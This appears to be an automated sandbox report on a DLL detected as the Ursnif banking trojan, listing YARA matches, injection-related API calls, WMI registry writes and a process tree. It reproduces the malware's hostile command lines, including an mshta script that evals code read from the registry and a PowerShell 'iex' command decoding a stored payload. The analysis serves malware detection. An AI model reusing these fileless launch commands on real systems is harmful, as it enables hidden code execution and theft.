Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie	1_2_04A0CB16
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie	1_2_04A0CB16

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.474076066.0000000004C1C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421520265.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421722913.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421588649.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.559791102.0000000000CC6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421746535.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421559513.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.530782557.0000000002C90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421467795.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421622681.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421656779.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7068, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6348, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6660, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A0C4B1 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,	1_2_04A0C4B1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A0547E NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_04A0547E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_049F75AA NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_049F75AA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A0EDF2 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	1_2_04A0EDF2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A0AE64 GetProcAddress,NtCreateSection,memset,	1_2_04A0AE64
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_049FB8EB NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	1_2_049FB8EB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A038DD NtMapViewOfSection,	1_2_04A038DD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A03013 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	1_2_04A03013
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A02131 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_04A02131
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_049FB96C RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	1_2_049FB96C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A0E3F9 NtQueryInformationProcess,	1_2_04A0E3F9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A0DB15 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	1_2_04A0DB15
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A0FC10 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	1_2_04A0FC10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_049F86CB NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_049F86CB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A0BE7C memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	1_2_04A0BE7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A0F7FD OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	1_2_04A0F7FD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A0FF30 NtGetContextThread,RtlNtStatusToDosError,	1_2_04A0FF30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A03F13 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	1_2_04A03F13
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A1096B memset,NtQueryInformationProcess,	1_2_04A1096B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A02B53 NtQuerySystemInformation,RtlNtStatusToDosError,	1_2_04A02B53
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CB6494 NtCreateSection,	38_2_00CB6494
Source: C:\Windows\System32\control.exe	Code function: 38_2_00C98820 NtReadVirtualMemory,	38_2_00C98820
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CA8D8C NtQueryInformationProcess,	38_2_00CA8D8C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CB59AC NtQueryInformationProcess,	38_2_00CB59AC
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CB4D5C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	38_2_00CB4D5C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00C9717C NtQueryInformationToken,NtQueryInformationToken,NtClose,	38_2_00C9717C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CA1E6C NtWriteVirtualMemory,	38_2_00CA1E6C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CB178C NtMapViewOfSection,	38_2_00CB178C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00C95384 NtAllocateVirtualMemory,	38_2_00C95384
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CA9358 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	38_2_00CA9358
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CCA02A NtProtectVirtualMemory,NtProtectVirtualMemory,	38_2_00CCA02A

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04A08C82 CreateProcessAsUserA,

1_2_04A08C82

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_049FFCF3	1_2_049FFCF3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A121B4	1_2_04A121B4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A0D1D5	1_2_04A0D1D5
Source: C:\Windows\System32\control.exe	Code function: 38_2_00C91008	38_2_00C91008
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CA7960	38_2_00CA7960
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CA9358	38_2_00CA9358
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CA24DC	38_2_00CA24DC
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CB38DC	38_2_00CB38DC
Source: C:\Windows\System32\control.exe	Code function: 38_2_00C9E8E8	38_2_00C9E8E8
Source: C:\Windows\System32\control.exe	Code function: 38_2_00C9F0BC	38_2_00C9F0BC
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CAD47C	38_2_00CAD47C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CB6008	38_2_00CB6008
Source: C:\Windows\System32\control.exe	Code function: 38_2_00C9AC2C	38_2_00C9AC2C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00C94424	38_2_00C94424
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CA15DC	38_2_00CA15DC
Source: C:\Windows\System32\control.exe	Code function: 38_2_00C915AC	38_2_00C915AC
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CA1178	38_2_00CA1178
Source: C:\Windows\System32\control.exe	Code function: 38_2_00C9812C	38_2_00C9812C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CA7120	38_2_00CA7120
Source: C:\Windows\System32\control.exe	Code function: 38_2_00C92AC0	38_2_00C92AC0
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CABAEC	38_2_00CABAEC
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CAEAE0	38_2_00CAEAE0
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CB2210	38_2_00CB2210
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CB4638	38_2_00CB4638
Source: C:\Windows\System32\control.exe	Code function: 38_2_00C947CC	38_2_00C947CC
Source: C:\Windows\System32\control.exe	Code function: 38_2_00C937D8	38_2_00C937D8
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CAF78C	38_2_00CAF78C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00C99390	38_2_00C99390
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CA2BB8	38_2_00CA2BB8
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CAA754	38_2_00CAA754
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CAE764	38_2_00CAE764
Source: C:\Windows\System32\control.exe	Code function: 38_2_00C9BB78	38_2_00C9BB78
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CB2F7C	38_2_00CB2F7C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00C9DB0C	38_2_00C9DB0C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CA2310	38_2_00CA2310
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CAC320	38_2_00CAC320
Source: C:\Windows\System32\control.exe	Code function: 38_2_00CABF38	38_2_00CABF38

Source: kboh4jur.dll.34.dr	Static PE information: No import functions for PE file found
Source: xjciegge.dll.36.dr	Static PE information: No import functions for PE file found

Source: mal.dll

Binary or memory string: OriginalFilenameLiquid.dllH vs mal.dll

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: mal.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal100.bank.troj.evad.winDLL@32/166@16/3

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_049FA4FF CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,

1_2_049FA4FF

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1384:120:WilError_01
Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{88D2CA97-47D4-FA04-113C-6BCED530CFE2}
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{B072D678-4FE6-621F-59E4-F3B69D58D74A}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{407745C0-9F81-72E2-2974-43C66DE8275A}

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF55EEAABB3F13D2AA.TMP

Jump to behavior

Source: mal.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: mal.dll

Virustotal: Detection: 8%

Source: regsvr32.exe

String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\mal.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\mal.dll
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17426 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:82958 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17442 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:82974 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3736.tmp' 'c:\Users\user\AppData\Local\Temp\kboh4jur\CSC3D4FC79349B84E14A11DB5BE381E50D0.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES48CA.tmp' 'c:\Users\user\AppData\Local\Temp\xjciegge\CSCE781F4B6FB444C94B757D31BBD45D613.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\mal.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17426 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:82958 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17442 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:82974 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3736.tmp' 'c:\Users\user\AppData\Local\Temp\kboh4jur\CSC3D4FC79349B84E14A11DB5BE381E50D0.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES48CA.tmp' 'c:\Users\user\AppData\Local\Temp\xjciegge\CSCE781F4B6FB444C94B757D31BBD45D613.TMP'
Source: C:\Windows\System32\control.exe	Process created: unknown unknown

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: mal.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: mal.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: mal.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: mal.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: mal.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: mal.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: mal.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: mal.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.pdbXP source: powershell.exe, 0000001F.00000002.588416083.000002BCB044F000.00000004.00000001.sdmp
Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000022.00000002.524161454.000001F970260000.00000002.00000001.sdmp, csc.exe, 00000024.00000002.534868528.0000022F9CC10000.00000002.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.pdb source: powershell.exe, 0000001F.00000002.588110987.000002BCB0417000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.pdbXP source: powershell.exe, 0000001F.00000002.588110987.000002BCB0417000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.532411050.0000000005AF0000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.532411050.0000000005AF0000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: control.exe, 00000026.00000002.562617431.0000018E5BDEC000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 00000026.00000002.562617431.0000018E5BDEC000.00000004.00000040.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.pdb source: powershell.exe, 0000001F.00000002.587767653.000002BCB03D7000.00000004.00000001.sdmp
Source:	Binary string: c:\Movenear\AgoSection\placeRace\Liquid.pdb source: mal.dll

Source: mal.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: mal.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: mal.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: mal.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: mal.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
